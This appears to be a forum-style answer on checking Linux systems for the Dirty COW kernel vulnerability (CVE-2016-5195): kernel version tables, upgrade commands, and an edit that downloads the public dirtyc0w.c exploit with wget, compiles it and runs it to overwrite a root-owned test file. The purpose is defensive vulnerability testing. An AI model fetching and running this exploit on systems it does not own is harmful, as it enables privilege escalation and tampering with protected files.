How to make sure that my operating system is not affected by CVE-2016-5195 (Dirty COW)?

You can do uname -rv to find out your Linux kernel version. You will get an output similar to below:

4.4.0-42-generic #62-Ubuntu SMP Fri Oct 7 23:11:45 UTC 2016

If your version is earlier than the following, you are affected:

4.8.0-26.28 for Ubuntu 16.10
4.4.0-45.66 for Ubuntu 16.04 LTS
3.13.0-100.147 for Ubuntu 14.04 LTS
3.2.0-113.155 for Ubuntu 12.04 LTS
3.16.36-1+deb8u2 for Debian 8
3.2.82-1 for Debian 7
4.7.8-1 for Debian unstable

According to security-tracker.debian, You need to run uname -a and verify your current kernel version .

wheezy  3.2.78-1                        vulnerable
wheezy (security)   3.2.82-1            fixed
jessie  3.16.36-1+deb8u1                vulnerable
jessie (security)   3.16.36-1+deb8u2    fixed
stretch, sid    4.7.8-1                 fixed

This vulnerability is patched under debian , by upgrading your system :

apt-get update
apt-get upgrade
apt-get dist-upgrade

Edit

How to make sure that my operating system is not affected by CVE-2016-5195?

You can try the following tutorial.

Download the exploit.

wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c

As root : Create the foo file:

su
echo this is not a test > foo

As user :

gcc -lpthread dirtyc0w.c -o dirtyc0w
gcc -pthread dirtyc0w.c -o dirtyc0w
./dirtyc0w foo m00000000000000000

Verify your file:

cat foo

On vulnerable machine you will get m00000000000000000 as output.

How to make sure that my operating system is not affected by CVE-2016-5195 (Dirty COW)?

Tags:

Linux

Dirty Cow

Related

Recent Posts